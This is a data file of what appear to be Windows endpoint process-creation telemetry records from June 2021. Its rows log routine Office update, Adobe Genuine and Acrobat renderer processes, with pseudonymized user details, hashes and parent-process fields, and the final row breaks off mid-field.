05:58:58+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,,,,,,,,,Invalid,Unknown,Valid,OsVendor,Adobe Systems Incorporated, LogTransport Application,8.2.0.14,LogTransport2,LogTransport2.exe,LogTransport Application,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1184,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 10:02:14.456028500+00:00,19592,taskhostw.exe,"taskhostw.exe ""C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe"" /frequentupdate SCHEDULEDTASK displaylevel=False",PortableExecutable,2021-04-14 01:10:22.932389100+00:00,C:\Windows\System32\taskhostw.exe,97096,564e4806ab18f93b93d551cd10c1598e,0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad,fed4b4a753a9541389aa670c69e624be07569ccd,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:02:14.612661900+00:00,2021-06-24 10:58:57.659574900+00:00,181b0c12-5cd0-4f92-a338-624dcd486ecd,computerpii_0a470890c60768167990033d701e7bd881398861,178970,False,10.7740.19041.1052,False,11540474045136925,,11540474045177797,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,taskhostw.exe,taskhostw.exe,Host Process for Windows Tasks
+1185,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:57:19.255776300+00:00,14516,AdobeGCClient.exe,"""AdobeGCClient.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a20196"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a20196""",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AdobeGCClient.exe,6743752,99b696fe03a14bd322f39fc35827e487,b57aab0a87e6c85ddf061a0a10bc10b96c61ae827fbb61f514a1df9fffcf263f,43d2475f42eeacb434b632975a33ebc8979a95b3,aba44041ab85b375a2d7a06b3e32bf84,eff994171e80a7d59637b48cf2d338399c468dc245ad8a7cb56d4d15bdc7dc89,791e623973adcbe6888602ae5314180c62f78677,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:57:19.199831900+00:00,20096,Adobe Genuine Launcher.exe,"""Adobe Genuine Launcher.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a20196"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a20196""",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:57:19.292631500+00:00,2021-06-25 00:57:53.259785200+00:00,b35821ea-5173-4354-988c-3cf2de60e224,computerpii_0a470890c60768167990033d701e7bd881398861,182293,False,10.7740.19041.1052,False,11540474045178548,,11540474045178551,2021-06-25 00:57:19.199831900+00:00,20096,2021-06-25 00:57:19.199831900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\Adobe Genuine Launcher.exe,20096,128,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,323272,2021-02-17 03:19:42+00:00,2021-02-16 19:38:26+00:00,2021-06-25 00:41:30.726772800+00:00,2020-09-22 19:30:00+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClientLauncher,AdobeGCClientLauncher.exe,Adobe Genuine Launch Utility,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClient,AdobeGCClient.exe,Adobe GC Client Application
+1186,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:57:20.469389+00:00,11764,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:57:17.314109+00:00,21452,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Desktop\Aplha Node Limited\KYB\FilePII_edd840c5ba4793ec460b8655ad56cb3a92e86a66.pdf""",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:57:20.553288700+00:00,2021-06-25 00:57:53.260830500+00:00,e42e44b9-c352-4160-87f4-7911fec4bbc6,computerpii_0a470890c60768167990033d701e7bd881398861,182304,False,10.7740.19041.1052,False,11540474045178537,,11540474045178552,2021-06-25 00:57:17.314109+00:00,21452,2021-06-25 00:57:17.314109+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,21452,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,3796704,2021-05-28 05:30:12+00:00,2021-05-28 05:58:58+00:00,2021-06-25 00:41:29.174931300+00:00,2021-05-28 05:58:58+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,1025.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC ,,,,,,
+1187,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:57:20.587283500+00:00,8772,AcroCEF.exe,"""AcroCEF.exe"" --type=renderer --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --touch-events=enabled --field-trial-handle=1900,1092239867532341100,10921521221057573338,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-gpu-compositing --lang=en-US --disable-pack-loading --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --log-severity=disable --product-version=""AcrobatServices/21.5.20048 Chrome/Ipv4PII_d1b09f1987215a731ca836b99c07a53884670a01"" --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=9096175063048860664 --renderer-client-id=2 --mojo-platform-channel-handle=1684 --allow-no-sandbox-job /prefetch:1",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:57:20.469389+00:00,11764,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",False,2021-06-25 00:57:17.314109+00:00,21452,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:57:20.625146800+00:00,2021-06-25 00:57:53.261130+00:00,5c675682-e62f-4115-92c1-f09aa04a0a5d,computerpii_0a470890c60768167990033d701e7bd881398861,182308,False,10.7740.19041.1052,False,11540474045178552,,11540474045178553,2021-06-25 00:57:20.469389+00:00,11764,2021-06-25 00:57:20.469389+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,11764,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF,7230688,2021-05-28 05:11:15+00:00,2021-05-28 05:58:58+00:00,2021-06-25 00:41:32.410110800+00:00,2021-05-28 05:58:58+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,0.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+1188,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:57:20.596036+00:00,388,AcroCEF.exe,"""AcroCEF.exe"" --type=gpu-process --field-trial-handle=1900,1092239867532341100,10921521221057573338,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-pack-loading --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --log-severity=disable --product-version=""AcrobatServices/21.5.20048 Chrome/Ipv4PII_d1b09f1987215a731ca836b99c07a53884670a01"" --lang=en-US --gpu-preferences=KAAAAAAAAADgACAgAQAAAAAAAAAAAGAAAAAAABAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --service-request-channel-token=13514298360973620242 --mojo-platform-channel-handle=1908 --allow-no-sandbox-job --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:57:20.469389+00:00,11764,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",False,2021-06-25 00:57:17.314109+00:00,21452,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:57:20.626474100+00:00,2021-06-25 00:57:53.261280600+00:00,93779d6f-ce46-41ba-9f06-aa770aeff048,computerpii_0a470890c60768167990033d701e7bd881398861,182310,False,10.7740.19041.1052,False,11540474045178552,,11540474045178554,2021-06-25 00:57:20.469389+00:00,11764,2021-06-25 00:57:20.469389+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,11764,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF,7230688,2021-05-28 05:11:15+00:00,2021-05-28 05:58:58+00:00,2021-06-25 00:41:32.410110800+00:00,2021-05-28 05:58:58+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,0.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+1189,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:57:20.668312500+00:00,20820,AcroCEF.exe,"""AcroCEF.exe"" --type=gpu-process --field-trial-handle=1900,1092239867532341100,10921521221057573338,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-pack-loading --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --log-severity=disable --product-version=""AcrobatServices/21.5.20048 Chrome/Ipv4PII_d1b09f1987215a731ca836b99c07a53884670a01"" --lang=en-US --gpu-preferences=KAAAAAAAAADgACAgAQAAAAAAAAAAAGAAAAAAABAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --service-request-channel-token=10229878959456543148 --mojo-platform-channel-handle=2248 --allow-no-sandbox-job --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:57:20.469389+00:00,11764,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",False,2021-06-25 00:57:17.314109+00:00,21452,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:57:20.682416100+00:00,2021-06-25 00:57:53.261954700+00:00,1af9107e-f644-44b1-b8aa-97665e037c0e,computerpii_0a470890c60768167990033d701e7bd881398861,182319,False,10.7740.19041.1052,False,11540474045178552,,11540474045178555,2021-06-25 00:57:20.469389+00:00,11764,2021-06-25 00:57:20.469389+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,11764,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF,7230688,2021-05-28 05:11:15+00:00,2021-05-28 05:58:58+00:00,2021-06-25 00:41:32.410110800+00:00,2021-05-28 05:58:58+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,0.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+1190,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:57:20.732137800+00:00,17764,AcroCEF.exe,"""AcroCEF.exe"" --type=gpu-process --field-trial-handle=1900,1092239867532341100,10921521221057573338,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-pack-loading --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --log-severity=disable --product-version=""AcrobatServices/21.5.20048 Chrome/Ipv4PII_d1b09f1987215a731ca836b99c07a53884670a01"" --lang=en-US --gpu-preferences=KAAAAAAAAADgACAgAQAAAAAAAAAAAGAAAAAAABAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --service-request-channel-token=9894572903082934760 --mojo-platform-channel-handle=1904 --allow-no-sandbox-job --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:57:20.469389+00:00,11764,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",False,2021-06-25 00:57:17.314109+00:00,21452,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:57:20.754808600+00:00,2021-06-25 00:57:53.262375400+00:00,659214a2-6510-486c-9adf-71cfb335b41a,computerpii_0a470890c60768167990033d701e7bd881398861,182325,False,10.7740.19041.1052,False,11540474045178552,,11540474045178556,2021-06-25 00:57:20.469389+00:00,11764,2021-06-25 00:57:20.469389+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,11764,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF,7230688,2021-05-28 05:11:15+00:00,2021-05-28 05:58:58+00:00,2021-06-25 00:41:32.410110800+00:00,2021-05-28 05:58:58+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,0.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+1191,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:57:22.288730400+00:00,20504,AcroCEF.exe,"""AcroCEF.exe"" --type=renderer --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --touch-events=enabled --field-trial-handle=1900,1092239867532341100,10921521221057573338,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-gpu-compositing --lang=en-US --disable-pack-loading --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --log-severity=disable --product-version=""AcrobatServices/21.5.20048 Chrome/Ipv4PII_d1b09f1987215a731ca836b99c07a53884670a01"" --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=16317171760956824159 --renderer-client-id=6 --mojo-platform-channel-handle=1856 --allow-no-sandbox-job /prefetch:1",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:57:20.469389+00:00,11764,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",False,2021-06-25 00:57:17.314109+00:00,21452,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:57:22.378485+00:00,2021-06-25 00:57:53.264354600+00:00,0d9819f5-1776-4c2d-b921-c4a728e045c1,computerpii_0a470890c60768167990033d701e7bd881398861,182352,False,10.7740.19041.1052,False,11540474045178552,,11540474045178557,2021-06-25 00:57:20.469389+00:00,11764,2021-06-25 00:57:20.469389+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,11764,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF,7230688,2021-05-28 05:11:15+00:00,2021-05-28 05:58:58+00:00,2021-06-25 00:41:32.410110800+00:00,2021-05-28 05:58:58+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,0.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+1192,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:57:24.853638900+00:00,9072,AdobeARM.exe,"""AdobeARM.exe"" /PRODUCT:Acrobat /VERSION:21.0 /MODE:3",PortableExecutable,2021-01-25 13:55:56+00:00,C:\Program Files (x86)\Common 